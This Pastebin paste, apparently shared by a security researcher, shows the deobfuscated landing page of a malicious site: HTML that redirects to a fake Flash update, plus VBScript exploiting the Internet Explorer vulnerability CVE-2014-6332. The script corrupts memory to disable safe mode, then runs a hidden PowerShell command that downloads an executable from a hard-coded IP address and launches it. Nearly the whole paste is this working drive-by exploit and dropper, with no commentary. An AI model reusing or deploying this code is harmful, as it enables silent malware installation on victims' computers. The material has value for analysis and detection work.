SHARE
TWEET

HTML redirection + CVE-2014-6332 exploit

tehsyntx Feb 22nd, 2015 (edited) 375 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ####
  2. Deobfuscated landingpage of oxprxt.tk
  3. thembits.blogspot.com
  4. @tehsyntx
  5. ####
  6.  
  7. <html><head>
  8. <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8">
  9. <meta http-equiv="refresh" content="3; url=http://oxprxt.tk/Adobe/get.adobe.com/flashplayer/flash_update.html">
  10. </head>
  11. <body background="bg.png">
  12. <title>Loading</title>
  13. <div style="text-align: center;"><IMG SRC="spacer top.png" ALT="image"></div>
  14. <div style="text-align: center;"><IMG SRC="sarah name.gif" ALT="image"></div>
  15. <div style="visibility: hidden">My Hidden Text </div>
  16. <div style="visibility: hidden">My Hidden Text </div>
  17. <div style="visibility: hidden">My Hidden Text </div>
  18. <div style="visibility: hidden">My Hidden Text </div>
  19. <div style="visibility: hidden">My Hidden Text </div>
  20. <div style="visibility: hidden">My Hidden Text </div>
  21. <div style="visibility: hidden">My Hidden Text </div>
  22. <div style="visibility: hidden">My Hidden Text </div>
  23. <div style="visibility: hidden">My Hidden Text </div>
  24. <div style="visibility: hidden">My Hidden Text </div>
  25. <div style="visibility: hidden">My Hidden Text </div>
  26. <div style="visibility: hidden">My Hidden Text </div>
  27. <div style="visibility: hidden">My Hidden Text </div>
  28. <div style="visibility: hidden">My Hidden Text </div>
  29. <div style="visibility: hidden">My Hidden Text </div>
  30. <div style="visibility: hidden">My Hidden Text </div>
  31. <div style="visibility: hidden">My Hidden Text </div>
  32. <div style="visibility: hidden">My Hidden Text </div>
  33. <div style="visibility: hidden">My Hidden Text </div>
  34. <div style="visibility: hidden">My Hidden Text </div>
  35. <div style="visibility: hidden">My Hidden Text </div>
  36. <div style="visibility: hidden">My Hidden Text </div>
  37. <div style="visibility: hidden">My Hidden Text </div>
  38. <div style="visibility: hidden">My Hidden Text </div>
  39. <div style="visibility: hidden">My Hidden Text </div>
  40. <div style="visibility: hidden">My Hidden Text </div>
  41. <div style="visibility: hidden">My Hidden Text </div>
  42. <div style="visibility: hidden">My Hidden Text </div>
  43. <div style="visibility: hidden">My Hidden Text </div>
  44. <div style="visibility: hidden">My Hidden Text </div>
  45. <div style="visibility: hidden">My Hidden Text </div>
  46. <div style="visibility: hidden">My Hidden Text </div>
  47. <div style="visibility: hidden">My Hidden Text </div>
  48. <div style="visibility: hidden">My Hidden Text </div>
  49. <div style="visibility: hidden">My Hidden Text </div>
  50. <div style="text-align: center;"><IMG SRC="load.gif" ALT="image"></div>
  51. <div style="text-align: center;"><img src="b1.png" onmouseover="this.src='b2.png';" onmouseout="this.src='b1.png';"onclick="location.href='http://oxprxt.tk/Adobe/get.adobe.com/flashplayer/flash_update.html';" />;
  52. </body>
  53. </html>
  54.  
  55. <script language="VBScript">
  56.  
  57. function runmumaa()
  58. On Error Resume Next
  59. set shell=createobject("Shell.Application")
  60. params="(New-Object System.Net.WebClient).DownloadFile('http://54.207.49.189/backend/ateb/Update.exe', $env:APPDATA   '\FILENAME.exe');$val = $env:APPDATA   '\Update.exe'; Start-Process $val" & command
  61.  
  62. shell.ShellExecute "powershell", params, "", "", 0
  63.  
  64. end function
  65.  
  66. </script>
  67.  
  68. <script language="VBScript">
  69.  
  70. dim   aa()
  71. dim   ab()
  72. dim   a0
  73. dim   a1
  74. dim   a2
  75. dim   a3
  76. dim   win9x
  77. dim   intVersion
  78. dim   rnda
  79. dim   funclass
  80. dim   myarray
  81.  
  82. Begin()
  83.  
  84. function Begin()
  85.   On Error Resume Next
  86.   info=Navigator.UserAgent
  87.  
  88.   if(instr(info,"Win64")>0)   then
  89.      exit   function
  90.   end if
  91.  
  92.   if (instr(info,"MSIE")>0)   then
  93.              intVersion = CInt(Mid(info, InStr(info, "MSIE")   5, 2))  
  94.   else
  95.      exit   function  
  96.              
  97.   end if
  98.  
  99.   win9x=0
  100.  
  101.   BeginInit()
  102.   If Create()=True Then
  103.      myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
  104.      myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
  105.  
  106.      if(intVersion<4) then
  107.          document.write("<br> IE")
  108.          document.write(intVersion)
  109.          runshellcode()                    
  110.      else  
  111.           setnotsafemode()
  112.      end if
  113.   end if
  114. end function
  115.  
  116. function BeginInit()
  117.    Randomize()
  118.    redim aa(5)
  119.    redim ab(5)
  120.    a0=13 17*rnd(6)
  121.    a3=7 3*rnd(5)
  122. end function
  123.  
  124. function Create()
  125.   On Error Resume Next
  126.   dim i
  127.   Create=False
  128.   For i = 0 To 400
  129.     If Over()=True Then
  130.     '   document.write(i)    
  131.       Create=True
  132.       Exit For
  133.    End If
  134.  Next
  135. end function
  136.  
  137. sub testaa()
  138. end sub
  139.  
  140. function mydata()
  141.    On Error Resume Next
  142.     i=testaa
  143.     i=null
  144.     redim  Preserve aa(a2)  
  145.  
  146.     ab(0)=0
  147.     aa(a1)=i
  148.     ab(0)=6.36598737437801E-314
  149.  
  150.     aa(a1 2)=myarray
  151.     ab(2)=1.74088534731324E-310  
  152.     mydata=aa(a1)
  153.     redim  Preserve aa(a0)  
  154. end function
  155.  
  156.  
  157. function setnotsafemode()
  158.    On Error Resume Next
  159.    i=mydata()  
  160.    i=readmemo(i 8)
  161.    i=readmemo(i 16)
  162.    j=readmemo(i &h134)  
  163.    for k=0 to &h60 step 4
  164.        j=readmemo(i &h120 k)
  165.        if(j=14) then
  166.              j=0          
  167.              redim  Preserve aa(a2)            
  168.     aa(a1 2)(i &h11c k)=ab(4)
  169.              redim  Preserve aa(a0)  
  170.  
  171.     j=0
  172.              j=readmemo(i &h120 k)  
  173.        
  174.               Exit for
  175.           end if
  176.  
  177.    next
  178.    ab(2)=1.69759663316747E-313
  179.    runmumaa()
  180. end function
  181.  
  182. function Over()
  183.    On Error Resume Next
  184.    dim type1,type2,type3
  185.    Over=False
  186.    a0=a0 a3
  187.    a1=a0 2
  188.    a2=a0 &h8000000
  189.  
  190.    redim  Preserve aa(a0)
  191.    redim   ab(a0)    
  192.  
  193.    redim  Preserve aa(a2)
  194.  
  195.    type1=1
  196.    ab(0)=1.123456789012345678901234567890
  197.    aa(a0)=10
  198.        
  199.    If(IsObject(aa(a1-1)) = False) Then
  200.       if(intVersion<4) then
  201.           mem=cint(a0 1)*16            
  202.           j=vartype(aa(a1-1))
  203.           if((j=mem 4) or (j*8=mem 8)) then
  204.              if(vartype(aa(a1-1))<>0)  Then    
  205.                 If(IsObject(aa(a1)) = False ) Then            
  206.                   type1=VarType(aa(a1))
  207.                 end if              
  208.              end if
  209.           else
  210.             redim  Preserve aa(a0)
  211.             exit  function
  212.  
  213.           end if
  214.        else
  215.           if(vartype(aa(a1-1))<>0)  Then    
  216.              If(IsObject(aa(a1)) = False ) Then
  217.                  type1=VarType(aa(a1))
  218.              end if              
  219.            end if
  220.        end if
  221.    end if
  222.            
  223.  
  224.    If(type1=&h2f66) Then        
  225.          Over=True      
  226.    End If  
  227.    If(type1=&hB9AD) Then
  228.          Over=True
  229.          win9x=1
  230.    End If  
  231.  
  232.    redim  Preserve aa(a0)          
  233.      
  234. end function
  235.  
  236. function ReadMemo(add)
  237.    On Error Resume Next
  238.    redim  Preserve aa(a2)  
  239.  
  240.    ab(0)=0  
  241.    aa(a1)=add 4    
  242.    ab(0)=1.69759663316747E-313      
  243.    ReadMemo=lenb(aa(a1))  
  244.  
  245.    ab(0)=0    
  246.  
  247.    redim  Preserve aa(a0)
  248. end function
  249.  
  250. </script>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top